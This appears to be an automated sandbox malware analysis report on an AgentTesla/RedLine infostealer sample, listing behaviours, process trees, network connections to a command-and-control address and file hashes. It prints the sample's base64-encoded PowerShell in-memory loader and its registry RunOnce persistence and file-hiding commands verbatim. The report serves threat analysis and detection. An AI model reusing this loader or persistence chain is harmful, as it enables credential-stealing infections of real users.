Malware Analysis Report

2024-11-15 09:53

Sample ID 241109-xwferazgqm
Target 4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c
SHA256 4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c
Tags
evasion discovery persistence agenttesla collection keylogger spyware stealer trojan redline infostealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c

Threat Level: Known bad

The file 4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c was found to be: Known bad.

Malicious Activity Summary

evasion discovery persistence agenttesla collection keylogger spyware stealer trojan redline infostealer

RedLine payload

Agenttesla family

RedLine

Redline family

AgentTesla

Sets file to hidden

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

outlook_win_path

outlook_office_path

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 19:11

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

146s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5072 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
PID 5072 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 1916 wrote to memory of 3792 N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 5072 wrote to memory of 5260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 5260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 63.141.237.204:7701 tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 63.141.237.204:7701 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 63.141.237.204:7701 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 63.141.237.204:7701 tcp
US 63.141.237.204:7701 tcp

Files

C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/1916-4-0x00007FFD99713000-0x00007FFD99715000-memory.dmp

memory/1916-5-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/1916-16-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/1916-11-0x000002A67D660000-0x000002A67D682000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsof1jje.ogt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1916-17-0x000002A67FD10000-0x000002A67FF44000-memory.dmp

memory/1916-18-0x000002A618000000-0x000002A61819E000-memory.dmp

memory/1916-19-0x000002A67FC30000-0x000002A67FCEE000-memory.dmp

memory/1916-20-0x000002A67D710000-0x000002A67D7A2000-memory.dmp

memory/3792-21-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/3792-24-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/3792-26-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/3792-25-0x000001DA24E20000-0x000001DA24F1C000-memory.dmp

memory/3792-27-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-40-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-38-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-48-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-84-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-78-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-76-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-82-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-88-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-86-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-80-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-74-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-70-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-68-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-67-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-64-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-60-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-58-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-56-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-54-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-52-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-72-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-62-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-50-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-46-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-44-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-42-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-36-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-34-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-32-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-30-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/3792-28-0x000001DA24E20000-0x000001DA24F18000-memory.dmp

memory/1916-1781-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/3792-2354-0x000001DA24F20000-0x000001DA24F92000-memory.dmp

memory/3792-2355-0x000001DA24F90000-0x000001DA25000000-memory.dmp

memory/3792-2356-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

memory/3792-2357-0x000001DA25040000-0x000001DA2508C000-memory.dmp

memory/3792-2358-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win7-20241023-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2084 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2084 wrote to memory of 2432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2084 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2084 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2084 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2084 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 2084 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 2084 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 2084 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
PID 2084 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2084 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2084 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/2452-6-0x0000000074901000-0x0000000074902000-memory.dmp

memory/2452-7-0x0000000074900000-0x0000000074EAB000-memory.dmp

memory/2452-8-0x0000000074900000-0x0000000074EAB000-memory.dmp

memory/2452-9-0x0000000074900000-0x0000000074EAB000-memory.dmp

memory/2452-10-0x0000000074900000-0x0000000074EAB000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

136s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" C:\Windows\system32\reg.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
